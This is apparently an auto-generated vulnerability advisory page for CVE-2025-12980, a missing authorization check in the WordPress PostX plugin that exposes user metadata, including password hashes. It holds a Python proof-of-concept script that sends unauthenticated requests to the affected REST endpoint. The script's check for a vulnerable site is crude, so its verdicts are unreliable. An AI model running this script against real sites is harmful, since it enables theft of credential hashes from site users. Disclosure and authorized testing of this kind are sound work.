Security Vulnerability Report
中文
CVE-2025-12980 CVSS 7.5 HIGH

CVE-2025-12980

Published: 2025-12-21 03:15:52
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the '/ultp/v2/get_dynamic_content/' REST API endpoint in all versions up to, and including, 5.0.3. This makes it possible for unauthenticated attackers to retrieve sensitive user metadata, including password hashes.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PostX插件所有版本 <= 5.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-12980 PoC - PostX Plugin Unauthorized User Metadata Access # Target: WordPress site with PostX plugin <= 5.0.3 def exploit_postx_cve_2025_12980(target_url): """ Exploit for CVE-2025-12980: PostX plugin missing authorization on /ultp/v2/get_dynamic_content/ REST API endpoint """ # API endpoint path endpoint = "/wp-json/ultp/v2/get_dynamic_content/" # Construct full URL url = target_url.rstrip('/') + endpoint print(f"[*] Targeting: {url}") print(f"[*] Exploiting CVE-2025-12980...") try: # Send unauthenticated request to the vulnerable endpoint # The endpoint should return user metadata without authentication response = requests.get(url, timeout=10) print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: data = response.json() print(f"[+] SUCCESS: Retrieved sensitive data") print(f"[+] Response: {json.dumps(data, indent=2)}") # Check for password hashes or sensitive metadata if 'data' in data or 'user_meta' in data: print("[!] VULNERABLE: User metadata exposed including password hashes") return True elif response.status_code == 401: print("[-] Not vulnerable or already patched") else: print(f"[*] Unexpected response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False # Usage example if __name__ == "__main__": # Replace with target URL target = "https://example-wordpress-site.com" exploit_postx_cve_2025_12980(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12980", "sourceIdentifier": "[email protected]", "published": "2025-12-21T03:15:51.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the '/ultp/v2/get_dynamic_content/' REST API endpoint in all versions up to, and including, 5.0.3. This makes it possible for unauthenticated attackers to retrieve sensitive user metadata, including password hashes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3421729/ultimate-post/trunk/classes/Blocks.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e85ff3b3-de41-4ac4-b825-b3238725ca44?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.